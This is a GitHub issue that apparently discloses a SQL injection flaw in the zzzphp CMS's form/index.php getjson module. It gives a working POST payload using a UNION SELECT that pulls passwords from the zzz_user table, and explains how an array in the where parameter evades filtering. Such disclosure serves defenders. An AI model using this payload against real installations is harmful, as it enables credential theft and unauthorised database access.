Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Vulnerability analysis #1

Open
h4ckdepy opened this issue Aug 19, 2020 · 0 comments
Open

Vulnerability analysis #1

h4ckdepy opened this issue Aug 19, 2020 · 0 comments
Labels
help wanted Extra attention is needed

Comments

@h4ckdepy
Copy link
Owner

h4ckdepy commented Aug 19, 2020

Injection point: http://127.0.0.1/zzzphp/form/index.php?module=getjson
Send a post request,and payload:
table=gbook&where[]=1=1 union select password from zzz_user&col=1
image
image

Analysis:
In the file:https://github.com/h4ckdepy/zzzphp/blob/master/form/index.php line:262
get_json() method supports execution through the getmodule() method and when the value of the $act variable is getjson. At this time, it will get the URL as follows: http://127.0.0.1/zzzphp/form/index.php?module=getjson Post. And in the where parameter, the array can be used to bypass the restriction, and there is no SQL injection filter on the parameter, resulting in SQL injection.

@h4ckdepy h4ckdepy added the help wanted Extra attention is needed label Aug 20, 2020
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
help wanted Extra attention is needed
Projects
None yet
Development

No branches or pull requests

1 participant